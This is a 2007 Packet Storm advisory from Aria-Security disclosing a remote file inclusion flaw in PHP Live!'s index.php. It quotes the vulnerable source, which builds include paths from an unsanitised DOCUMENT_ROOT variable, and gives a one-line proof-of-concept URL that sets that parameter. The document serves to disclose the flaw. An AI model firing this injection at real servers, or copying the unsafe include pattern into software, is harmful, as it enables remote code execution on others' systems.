phplive-rfi.txt

2007-10-25T00:00:00
ID PACKETSTORM:60404
Type packetstorm
Reporter Outlaw
Modified 2007-10-25T00:00:00

Description

                                        
                                            `________________________________  
  
Aria-Security Team  
http://Aria-Security.Net  
Persian Security Network  
________________________________  
  
Source Code:  
  
<?  
/*******************************************************  
* COPYRIGHT OSI CODES - PHP Live!  
*******************************************************/  
session_start() ;  
$l = "" ;  
// try to get cookie value first  
if ( isset( $HTTP_COOKIE_VARS['COOKIE_PHPLIVE_SITE'] ) ) { $l = $HTTP_COOKIE_VARS['COOKIE_PHPLIVE_SITE'] ; }  
if ( isset( $HTTP_GET_VARS['l'] ) ) { $l = $HTTP_GET_VARS['l'] ; }  
if ( isset( $HTTP_POST_VARS['l'] ) ) { $l = $HTTP_POST_VARS['l'] ; }  
  
if ( !file_exists( "./web/conf-init.php" ) )  
{  
HEADER( "location: setup/index.php" ) ;  
exit ;  
}  
include_once("./web/conf-init.php") ;  
if ( file_exists( "web/$l/$l-conf-init.php" ) && $l )  
include_once("./web/$l/$l-conf-init.php") ;  
include_once("$DOCUMENT_ROOT/API/Util_Error.php") ;  
include_once("$DOCUMENT_ROOT/system.php") ;  
include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ;  
include_once("$DOCUMENT_ROOT/web/VERSION_KEEP.php") ;  
include_once("$DOCUMENT_ROOT/API/Util_CleanFiles.php") ;  
include_once("$DOCUMENT_ROOT/API/sql.php" ) ;  
include_once("$DOCUMENT_ROOT/API/Users/get.php") ;  
include_once("$DOCUMENT_ROOT/API/Users/update.php") ;  
include_once("$DOCUMENT_ROOT/API/Chat/remove.php") ;  
include_once("$DOCUMENT_ROOT/API/ASP/get.php") ;  
?>  
  
Affected file: Index.php  
Poc:  
/index.php?DOCUMENT_ROOT=file.txt ?  
Credits: Aria-Security  
The-0utl4w  
`